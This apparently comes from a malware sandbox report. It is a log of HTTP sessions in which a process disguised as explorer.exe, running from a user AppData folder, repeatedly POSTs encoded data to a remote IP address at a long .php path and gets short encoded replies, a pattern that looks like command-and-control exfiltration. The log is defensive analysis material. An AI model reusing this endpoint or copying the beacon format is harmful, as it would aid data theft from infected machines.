                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:32:51.455820084 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 1456
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:32:51.813321114 CET1456OUTData Raw: 56 57 58 5e 56 5d 50 53 5b 5f 52 55 59 5e 57 5f 57 5c 5f 5c 50 5a 56 5a 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VWX^V]PS[_RUY^W_W\_\PZVZ_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!\:<'^0>U(??%?3$;?'3+#4&>%'>0_/$[' \,
                                                      Dec 13, 2024 14:32:52.539679050 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:32:52.777343988 CET349INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:32:52 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 39 38 0d 0a 00 1a 27 5b 3f 3a 23 11 26 05 05 0f 30 2d 36 01 3e 06 29 13 2c 2f 3f 01 24 1d 3f 50 3c 30 26 13 3d 0a 28 07 2b 20 2e 02 23 01 3b 0c 39 0c 2f 5f 0d 11 3b 02 37 3d 2d 03 2d 2d 28 00 3d 07 31 59 2b 06 21 5f 2a 10 3c 59 27 2b 08 1e 26 5b 22 13 2b 07 2c 0f 3f 38 3c 5e 3a 02 26 06 32 0f 2f 57 0d 1e 27 55 3f 0c 35 58 23 5e 3c 5e 22 2d 17 10 2a 1d 3e 53 35 07 3b 5d 31 00 3d 5b 27 2c 27 0c 34 0a 20 5c 26 1d 23 1d 27 29 24 0b 26 15 2e 50 2a 00 29 51 0f 32 54 54 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 98'[?:#&0-6>),/?$?P<0&=(+ .#;9/_;7=---(=1Y+!_*<Y'+&["+,?8<^:&2/W'U?5X#^<^"-*>S5;]1=[','4 \&#')$&.P*)Q2TT0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      11192.168.2.64979645.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:32:51.940047979 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2564
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:32:52.297672987 CET2564OUTData Raw: 56 53 5d 5b 56 5d 50 53 5b 5f 52 55 59 59 57 58 57 5c 5f 5b 50 5d 56 53 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VS][V]PS[_RUYYWXW\_[P]VS_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!- 0#R>/(X'+$< (3Z'8)X T+%23',$[' \,*
                                                      Dec 13, 2024 14:32:53.025230885 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:32:53.261082888 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:32:52 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      12192.168.2.64980245.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:32:53.512461901 CET309OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:32:53.860172033 CET2568OUTData Raw: 56 51 5d 5b 56 5c 55 52 5b 5f 52 55 59 58 57 5f 57 5a 5f 59 50 5a 56 5a 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VQ][V\UR[_RUYXW_WZ_YPZVZ_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX["-<3>T>,8[$3'*7<$: #Z25@%.+;$[' \,"
                                                      Dec 13, 2024 14:32:54.614403963 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:32:54.833034039 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:32:54 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      13192.168.2.64980745.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:32:55.110008001 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:32:55.469564915 CET2568OUTData Raw: 53 51 5d 5c 56 58 50 50 5b 5f 52 55 59 50 57 58 57 5f 5f 5f 50 52 56 5c 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SQ]\VXPP[_RUYPWXW___PRV\_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!9'3>#T(<83(V'8('Z&8)Y7231>G3X,X8-$[' \,
                                                      Dec 13, 2024 14:32:56.300745964 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:32:56.533082962 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:32:56 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      14192.168.2.64981345.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:32:56.782488108 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:32:57.141463041 CET2568OUTData Raw: 53 57 58 5b 53 5e 50 55 5b 5f 52 55 59 5b 57 5a 57 5f 5f 5c 50 53 56 53 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SWX[S^PU[_RUY[WZW__\PSVS_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!^,/?'X$?Z [$Z4S'?43X&;431@'>0X;=$[' \,.


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      15192.168.2.64981545.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:32:57.904215097 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 1456
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:32:58.250763893 CET1456OUTData Raw: 53 51 58 5c 53 58 50 50 5b 5f 52 55 59 58 57 5e 57 52 5f 5a 50 59 56 5d 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SQX\SXPP[_RUYXW^WR_ZPYV]_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX["-<4&.'?3$<0' ?'7Z'[##Y%"0>Y/=$[' \,"
                                                      Dec 13, 2024 14:32:58.989263058 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:32:59.229100943 CET349INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:32:58 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 39 38 0d 0a 00 1a 27 5a 3f 00 34 0a 25 02 38 12 27 13 07 11 29 59 22 00 2c 2c 3c 5f 26 24 2f 51 2a 33 21 09 3e 37 28 01 2a 1d 3e 00 20 59 3f 0f 2e 36 2f 5f 0d 11 38 13 20 3d 2d 03 3b 5b 27 11 3e 10 25 5e 2b 01 25 5f 3d 00 0d 04 24 15 3a 1c 24 3d 32 56 2b 5f 28 0f 2b 05 3c 17 2e 12 07 5d 25 35 2f 57 0d 1e 27 50 29 32 29 5e 34 38 12 14 22 04 35 59 2a 1a 2e 1d 21 39 27 5b 26 2e 0f 14 31 05 23 0c 34 23 0e 10 31 1d 34 0d 33 29 23 1e 31 05 2e 50 2a 00 29 51 0f 32 54 54 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 98'Z?4%8')Y",,<_&$/Q*3!>7(*> Y?.6/_8 =-;['>%^+%_=$:$=2V+_(+<.]%5/W'P)2)^48"5Y*.!9'[&.1#4#143)#1.P*)Q2TT0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      16192.168.2.64981645.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:32:58.030399084 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:32:58.375778913 CET2568OUTData Raw: 53 51 58 5b 56 5d 55 5f 5b 5f 52 55 59 5b 57 5e 57 58 5f 5c 50 58 56 52 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SQX[V]U_[_RUY[W^WX_\PXVR_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!:$=/S(Y3'/(('?[&(& "($-%'/-$[' \,.
                                                      Dec 13, 2024 14:32:59.116645098 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:32:59.351181984 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:32:58 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      17192.168.2.64982245.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:32:59.592679977 CET309OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:32:59.938399076 CET2568OUTData Raw: 56 56 5d 53 56 5f 50 55 5b 5f 52 55 59 5c 57 5e 57 5c 5f 5e 50 5f 56 53 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VV]SV_PU[_RUY\W^W\_^P_VS_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[",/?'.?+<(X',<$,7_(77Z')^ 13%-9%.,/$[' \,2
                                                      Dec 13, 2024 14:33:00.678548098 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:00.917119026 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:00 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      18192.168.2.64982845.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:33:01.170731068 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:33:01.516442060 CET2568OUTData Raw: 53 56 5d 5d 56 5a 55 54 5b 5f 52 55 59 5a 57 5e 57 52 5f 5d 50 5a 56 5e 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SV]]VZUT[_RUYZW^WR_]PZV^_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!.</3-'</$0?+%,'_(B#Y3;!^""3$-!C$(8-$[' \,*
                                                      Dec 13, 2024 14:33:02.315752029 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:02.564076900 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:02 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      19192.168.2.64983045.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:33:03.124161959 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:33:03.469582081 CET2568OUTData Raw: 56 52 5d 58 56 54 55 5e 5b 5f 52 55 59 50 57 58 57 5c 5f 5c 50 58 56 58 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VR]XVTU^[_RUYPWXW\_\PXVX_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[!,?4'(+<0/<T$,4+?^' 1?[11G$X$Z,$[' \,
                                                      Dec 13, 2024 14:33:04.210403919 CET25INHTTP/1.1 100 Continue


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      20192.168.2.64983645.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:33:04.356209993 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 1456
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:33:04.703957081 CET1456OUTData Raw: 56 55 5d 5f 53 5b 50 55 5b 5f 52 55 59 50 57 5d 57 5c 5f 58 50 5d 56 5a 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: VU]_S[PU[_RUYPW]W\_XP]VZ_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX[".#3.'S?/$[3<$/'X($0=_ ",1="3 --$[' \,
                                                      Dec 13, 2024 14:33:05.441090107 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:05.677130938 CET349INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:05 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 39 38 0d 0a 00 1a 24 06 2b 29 3c 0d 25 05 20 1f 30 2e 36 06 3d 06 22 00 39 3f 01 02 27 42 28 09 2b 20 39 0d 3f 37 2f 5e 2a 1d 00 04 21 3f 28 12 2e 0c 2f 5f 0d 11 38 59 23 3e 36 12 2c 2d 0a 03 3e 3e 35 17 28 3c 22 06 3e 3e 2f 05 30 15 26 1f 25 2e 3e 55 2b 29 2b 1d 3f 02 27 05 2d 3f 3d 5f 32 35 2f 57 0d 1e 27 55 3c 32 36 07 23 3b 38 1b 22 2d 39 10 29 37 3a 54 35 07 2f 10 26 3d 32 03 26 3c 2b 0c 37 30 37 01 26 33 20 0a 27 3a 2f 1f 26 2f 2e 50 2a 00 29 51 0f 32 54 54 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 98$+)<% 0.6="9?'B(+ 9?7/^*!?(./_8Y#>6,->>5(<">>/0&%.>U+)+?'-?=_25/W'U<26#;8"-9)7:T5/&=2&<+707&3 ':/&/.P*)Q2TT0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      21192.168.2.64983745.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:33:04.477627993 CET333OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Connection: Keep-Alive
                                                      Dec 13, 2024 14:33:04.829014063 CET2568OUTData Raw: 53 57 5d 5c 56 54 55 52 5b 5f 52 55 59 5a 57 5e 57 5f 5f 5d 50 5e 56 5c 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: SW]\VTUR[_RUYZW^W__]P^V\_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX["-?43>#V<\$/4$;<Z$;%["13Z%=%0>(;$[' \,*
                                                      Dec 13, 2024 14:33:05.563888073 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:05.797722101 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:05 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      22192.168.2.64984345.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 13, 2024 14:33:06.041651011 CET309OUTPOST /Process2Dump3/Geo3Game/Windowsjs_/7/linePacketprocessorauthSqlBasewindowsWordpressTemporary.php HTTP/1.1
                                                      Content-Type: application/octet-stream
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                      Host: 45.88.91.89
                                                      Content-Length: 2568
                                                      Expect: 100-continue
                                                      Dec 13, 2024 14:33:06.391482115 CET2568OUTData Raw: 56 5b 5d 5a 53 5e 55 51 5b 5f 52 55 59 5d 57 5f 57 5f 5f 53 50 53 56 5a 5f 41 58 57 53 56 58 5c 43 45 50 59 57 52 5b 50 5d 5e 5a 5c 55 54 50 5b 5b 5d 47 5b 5b 5b 50 50 54 58 54 5a 51 5b 57 5a 50 5a 43 5b 54 5f 56 59 5a 5a 58 53 5d 58 58 5d 55 58
                                                      Data Ascii: V[]ZS^UQ[_RUY]W_W__SPSVZ_AXWSVX\CEPYWR[P]^Z\UTP[[]G[[[PPTXTZQ[WZPZC[T_VYZZXS]XX]UXURUZ_[U^WUXQPT^UXRPSC]^TB]_XCZTA]V\_]Y[Z[\[QZT]TVY[UUP_XUWXXTUPPP]Z\WP[ZZ^X\Q^]^Y_P[ZYUYZ[T^QXGXY]ZTX["-//0>>, Z$<$Z+X*7?0&7?^$=6'$[8=$[' \,6
                                                      Dec 13, 2024 14:33:07.239779949 CET25INHTTP/1.1 100 Continue
                                                      Dec 13, 2024 14:33:07.473078966 CET200INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Fri, 13 Dec 2024 13:33:07 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: keep-alive
                                                      Vary: Accept-Encoding
                                                      Data Raw: 34 0d 0a 32 52 5e 57 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 42R^W0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      23192.168.2.64984745.88.91.89808088C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      TimestampBytes transferredDirectionData
